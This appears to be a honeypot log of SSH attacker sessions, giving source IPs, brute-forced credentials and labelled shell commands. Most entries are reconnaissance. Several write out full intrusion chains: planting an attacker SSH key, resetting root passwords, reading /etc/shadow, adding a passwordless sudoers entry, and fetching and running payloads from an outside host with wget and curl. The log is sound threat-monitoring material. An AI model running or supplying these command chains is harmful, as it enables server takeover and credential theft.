↳ OS/kernel identification

🎭 shadow_root_43 (179.43.186.241) — Rümlang, Switzerland · 3 sessions · 3 cmds

2026-04-03 05:29 EDT · as root/admin, root/password, root/root

privilege check

$ id ×3

↳ privilege check

🎭 jade_root_14 (120.48.102.177) — Beijing, China · 1 session · 2 cmds

2026-04-03 15:00 EDT · as oracle/Oracle17

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 specter_root_51 (14.241.100.20) — Da Nang, Vietnam · 1 session · 9 cmds

2026-04-03 12:39 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 chateau_root_3 (89.168.34.129) — Paris, France · 1 session · 9 cmds

2026-04-03 11:59 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 wok_root_30 (118.196.27.115) — Haidian, China · 1 session · 1 cmd

2026-04-03 09:47 EDT · as user/user

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 lotus_root_10 (159.65.144.167) — Bengaluru, India · 1 session · 1 cmd

2026-04-03 01:36 EDT · as root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;chsh -s /bin/sh daemon;echo Password123 |passwd daemon --stdin;mkdir ~/.ssh;chattr -ia ~/.ssh/* ~/.ssh;wget http://103.56.149.224/cacti/ns1.jpg -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;chmod 700 ~/ ~/.ssh;wget http://103.56.149.224/cacti/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;wget http://103.56.149.224/cacti/oto -O /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;curl http://103.56.149.224/cacti/oto -o /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;rm -f /tmp/oto

↳ password hash extraction

🎭 hanbok_root_8 (175.206.113.91) — Wŏnju, South Korea · 1 session · 1 cmd

2026-04-02 22:40 EDT · as deploy/deploy

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 yankee_sol_8 (165.245.169.70) — Broomfield, United States · 1 session · 1 cmd

2026-04-02 18:27 EDT · as validator/validator

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m

↳ obfuscated system check

🎭 windmill_root_4 (178.16.54.95) — Amsterdam, Netherlands · 15 sessions · 60 cmds

2026-03-28 03:23 EDT · as admin/123456, admin/admin, admin/admin123

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×15

$ uname -s -v -n -m 2 > /dev/null ×15

$ uname -m 2 > /dev/null ×15

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×15

🎭 rogue_root_40 (207.46.224.82) — Singapore, Singapore · 3 sessions · 3 cmds

2026-04-02 09:00 EDT · as root/1234, root/123456, root/12345678

ps → history snooping → ssh (repeated ssh 3x)

$ ps aux | head -10

$ history | tail -5

↳ history snooping

$ ssh -V

🎭 blitz_sol (130.12.181.107) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-04-02 07:07 EDT · as oracle/ABC123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 kimchi_root_6 (211.196.83.100) — Seongbuk-gu, South Korea · 1 session · 9 cmds

2026-04-02 02:27 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 specter_root (206.123.145.72) — Tirana, Albania · 1 session · 1 cmd

2026-04-01 23:42 EDT · as oracle/Qaz@2134

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 eagle_root (159.65.220.10) — North Bergen, United States · 35 sessions · 35 cmds

2026-04-01 16:22 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 strudel_sol_2 (130.12.181.105) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-04-01 16:18 EDT · as oracle/passwd123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 rogue_sol_2 (206.123.145.73) — Tirana, Albania · 1 session · 1 cmd

2026-03-31 22:15 EDT · as oracle/qweasdrf196

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 liberty_sol_5 (57.151.137.34) — Cheyenne, United States · 3 sessions · 3 cmds

2026-03-31 13:16 EDT · as root/admin123, root/qwerty, root/root

ssh → pwd → OS/kernel identification

$ ssh -V

$ pwd

$ uname -a

↳ OS/kernel identification

🎭 star_sol_4 (4.246.135.70) — Boydton, United States · 1 session · 1 cmd

2026-03-31 15:00 EDT · as root/password

hostname discovery

$ hostname

↳ hostname discovery

🎭 cowboy_sol_7 (4.246.135.69) — Boydton, United States · 7 sessions · 8 cmds

2026-03-31 12:38 EDT · as root/1234, root/12345678, root/admin123

nproc/cpuinfo enumeration → hostname verification → history inspection → uname -a OS fingerprinting → / filesystem audit → model name extraction for hardware profiling

$ nproc 2>/dev/null || (grep -c '^processor' /proc/cpuinfo 2>/dev/null) || echo 0

$ grep -c ^processor /proc/cpuinfo 2 > /dev/null

$ history | tail -5

↳ history snooping

$ hostname ×2

↳ hostname discovery

$ ls -la /

$ uname -a

↳ OS/kernel identification

$ grep 'model name' /proc/cpuinfo 2>/dev/null | head -1 | cut -d ':' -f2- | sed 's/^ *//' | xargs || echo unknown

🎭 strudel_root_4 (91.92.240.199) — Frankfurt am Main, Germany · 7 sessions · 28 cmds

2026-03-31 02:23 EDT · as root/1234, root/123456, root/12345678

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 blitz_root_2 (130.12.181.103) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-03-30 21:09 EDT · as oracle/abc12345

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 yankee_root_15 (161.35.112.135) — North Bergen, United States · 6 sessions · 24 cmds

2026-03-30 05:41 EDT · as root/123456, root/12345678, root/admin

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 wok_root_31 (118.145.231.71) — Haidian, China · 1 session · 1 cmd

2026-03-29 21:51 EDT · as root/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 chai_root_10 (103.155.57.54) — Noida, India · 1 session · 19 cmds

2026-03-29 21:34 EDT · as root/P@ssw0rd1!

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:ejuw5sG0pT7z"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 strudel_root (130.12.181.101) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-03-29 19:32 EDT · as oracle/1q2w3e!@#

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 ghost_sol_2 (206.123.145.50) — Tirana, Albania · 1 session · 1 cmd

2026-03-29 17:16 EDT · as mysql/mysql

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 phantom_root_3 (206.123.145.54) — Tirana, Albania · 1 session · 1 cmd

2026-03-29 16:52 EDT · as oracle/ORACLE

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 lantern_root_23 (111.36.57.69) — Jining, China · 1 session · 1 cmd

2026-03-29 16:10 EDT · as root/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 dragon_root_18 (39.171.252.186) — Hangzhou, China · 1 session · 1 cmd

2026-03-29 15:21 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 shadow_root_2 (206.123.145.49) — Tirana, Albania · 1 session · 1 cmd

2026-03-29 14:10 EDT · as oracle/a

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 phantom_root_5 (206.123.145.75) — Tirana, Albania · 1 session · 1 cmd

2026-03-29 13:51 EDT · as oracle/oracle123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 shadow_sol_4 (206.123.145.69) — Tirana, Albania · 1 session · 1 cmd

2026-03-29 13:46 EDT · as oracle/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 autobahn_root_4 (130.12.181.100) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-03-29 13:09 EDT · as oracle/pass1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 strudel_root_2 (130.12.181.97) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-03-29 12:52 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 rogue_root_10 (206.123.145.70) — Tirana, Albania · 1 session · 1 cmd

2026-03-29 09:08 EDT · as pi/raspberry

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 ghost_root_69 (103.193.178.248) — Cicurug, Indonesia · 1 session · 19 cmds

2026-03-29 08:33 EDT · as root/12345678

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:z7FzRkcddhoS"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 satay_root_3 (202.165.15.88) — Kuala Lumpur, Malaysia · 4 sessions · 4 cmds

2026-03-21 05:14 EDT · as root/123456, root/root

Ran uname 3x across 3 sessions — automated OS fingerprinting.

$ uname -s -m ×4

🎭 lantern_root_24 (220.178.8.154) — Hefei, China · 1 session · 9 cmds

2026-03-29 06:16 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 jade_root_15 (1.192.202.92) — Zhengzhou, China · 1 session · 1 cmd

2026-03-29 03:41 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 cipher_sol_2 (206.123.145.53) — Tirana, Albania · 1 session · 1 cmd

2026-03-29 03:20 EDT · as miner/miner

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 wraith_root_18 (206.123.145.46) — Tirana, Albania · 1 session · 1 cmd

2026-03-29 02:13 EDT · as admin/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 autobahn_root_7 (130.12.181.102) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-03-29 02:09 EDT · as root/admin

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 ghost_root_30 (206.123.145.20) — Tirana, Albania · 1 session · 1 cmd

2026-03-29 01:59 EDT · as oracle/Oracle123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 wraith_root_43 (206.123.145.57) — Tirana, Albania · 1 session · 1 cmd

2026-03-29 00:39 EDT · as oracle/abc123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 shadow_root_44 (206.123.145.76) — Tirana, Albania · 1 session · 1 cmd

2026-03-29 00:32 EDT · as oracle/thinker

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 wraith_root_44 (206.123.145.71) — Tirana, Albania · 1 session · 1 cmd

2026-03-28 23:52 EDT · as test/test

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 strudel_root_9 (130.12.181.109) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-03-28 23:20 EDT · as oracle/oracle123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 shadow_root_45 (206.123.145.77) — Tirana, Albania · 1 session · 1 cmd

2026-03-28 22:40 EDT · as user/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 pretzel_root_8 (130.12.181.108) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-03-28 21:22 EDT · as oracle/0r@cl3

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 pretzel_root_9 (130.12.181.106) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-03-28 20:44 EDT · as admin/admin

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 cipher_root_65 (206.123.145.78) — Tirana, Albania · 1 session · 1 cmd

2026-03-28 20:41 EDT · as ubuntu/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 ghost_root_70 (206.123.145.51) — Tirana, Albania · 1 session · 1 cmd

2026-03-28 20:37 EDT · as oracle/oracle

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 cipher_root_66 (206.123.145.52) — Tirana, Albania · 1 session · 1 cmd

2026-03-28 20:35 EDT · as oracle/passw0rd

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 pretzel_root_10 (130.12.181.104) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-03-28 19:30 EDT · as oracle/916495a3@c4e778B8824fa763158be46

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 fog_sol (46.101.72.19) — Slough, United Kingdom · 2 sessions · 2 cmds

2026-03-28 18:26 EDT · as sol/sol, solana/solana

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×2

↳ obfuscated system check

🎭 beefeater_sol (144.126.192.9) — Slough, United Kingdom · 3 sessions · 3 cmds

2026-03-28 18:23 EDT · as sol/sol, solana/solana, ubuntu/ubuntu

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×3

↳ obfuscated system check

🎭 phantom_root_41 (206.123.145.56) — Tirana, Albania · 1 session · 1 cmd

2026-03-28 18:20 EDT · as oracle/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 cipher_root_67 (206.123.145.48) — Tirana, Albania · 1 session · 1 cmd

2026-03-28 18:17 EDT · as root/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 wraith_root_45 (206.123.145.79) — Tirana, Albania · 1 session · 1 cmd

2026-03-28 16:46 EDT · as oracle/oracle123#

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 rogue_root_41 (151.242.30.119) — Centurion, South Africa · 1 session · 19 cmds

2026-03-28 16:44 EDT · as root/P@ssw0rd1!

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:TWjDAtio5xSw"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

